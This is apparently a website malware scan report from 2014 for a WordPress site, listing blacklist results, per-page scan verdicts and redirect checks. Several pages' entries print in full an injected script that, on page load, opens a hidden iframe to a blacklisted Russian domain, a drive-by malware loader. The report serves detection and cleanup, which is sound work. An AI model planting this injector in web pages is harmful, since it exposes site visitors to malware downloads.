Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=loriancomm.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://loriancomm.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://loriancomm.com/ | 200 OK Content-Length: 11069 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('3356u2');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="3356u2";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function zbzcmpj(){create_frame("http://rabiorik.ru/vwvnmfc.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',zbzcmpj)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();zbzcmpj()};window.onload=newonload}else{window.onload=zbzcmpj}}}catch(err){} Decoded script: function zbzcmpj() { create_frame("http://rabiorik.ru/vwvnmfc.cgi?default"); } | ||
http://loriancomm.com/wp-includes/js/comment-reply.min.js?ver=3.6.1 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://loriancomm.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://loriancomm.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://loriancomm.com/wp-content/themes/u-design/scripts/script.js?ver=1.0 | 200 OK Content-Length: 7253 Content-Type: application/javascript | clean |
http://loriancomm.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.js?ver=3.09 | 200 OK Content-Length: 14238 Content-Type: application/javascript | clean |
http://loriancomm.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.2 | 200 OK Content-Length: 6630 Content-Type: application/javascript | clean |
http://loriancomm.com/wp-includes/js/hoverIntent.min.js?ver=r7 | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://loriancomm.com/services/ | 200 OK Content-Length: 11751 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rabiorik.ru ...[13045 bytes skipped]... /></html><script type='text/javascript'> function create_frame(a){var b=document.getElementById('r4');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="r4";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function 534axb1(){create_frame("http://rabiorik.ru/ouijbwt.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',534axb1)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();534axb1()};window.onload=newonload}else{window.onload=534axb1}}}catch(err){} </script> <!-- Dynamic page generated in 0.590 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2014-06-09 06:58:18 --> <!-- super cache --> | ||
http://loriancomm.com/faq/ | 200 OK Content-Length: 14204 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('14u');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="14u";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function kxp3454(){create_frame("http://rabiorik.ru/xbfuioi.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',kxp3454)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();kxp3454()};window.onload=newonload}else{window.onload=kxp3454}}}catch(err){} Decoded script: function kxp3454() { create_frame("http://rabiorik.ru/xbfuioi.cgi?default"); } | ||
http://loriancomm.com/testimonials/ | 200 OK Content-Length: 12637 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('eyo5');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="eyo5";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function sobwgcb(){create_frame("http://rabiorik.ru/kgwsenw.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',sobwgcb)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();sobwgcb()};window.onload=newonload}else{window.onload=sobwgcb}}}catch(err){} Decoded script: function sobwgcb() { create_frame("http://rabiorik.ru/kgwsenw.cgi?default"); } | ||
http://loriancomm.com/about-us/ | 200 OK Content-Length: 11821 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('qp57');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="qp57";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function l5qc24n(){create_frame("http://rabiorik.ru/zoanyiq.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',l5qc24n)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();l5qc24n()};window.onload=newonload}else{window.onload=l5qc24n}}}catch(err){} Decoded script: function l5qc24n() { create_frame("http://rabiorik.ru/zoanyiq.cgi?default"); } | ||
http://loriancomm.com/contact-us/ | 200 OK Content-Length: 12049 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('2o32');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="2o32";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function jbwzt5j(){create_frame("http://rabiorik.ru/cwsvroc.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',jbwzt5j)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();jbwzt5j()};window.onload=newonload}else{window.onload=jbwzt5j}}}catch(err){} Decoded script: function jbwzt5j() { create_frame("http://rabiorik.ru/cwsvroc.cgi?default"); } | ||
http://loriancomm.com/test404page.js | 404 Not Found Content-Length: 10145 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: rabiorik.ru ...[11440 bytes skipped]... </html><script type='text/javascript'> function create_frame(a){var b=document.getElementById('36i');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="36i";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function 15ztmeb(){create_frame("http://rabiorik.ru/tovrmdw.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',15ztmeb)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();15ztmeb()};window.onload=newonload}else{window.onload=15ztmeb}}}catch(err){} </script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: loriancomm.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 Jun 2014 06:58:09 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://loriancomm.com/xmlrpc.php
GET / HTTP/1.1
Host: loriancomm.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 Jun 2014 06:58:09 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://loriancomm.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: loriancomm.com
Referer: http://www.google.com/search?q=loriancomm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: loriancomm.com
Referer: http://www.google.com/search?q=loriancomm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.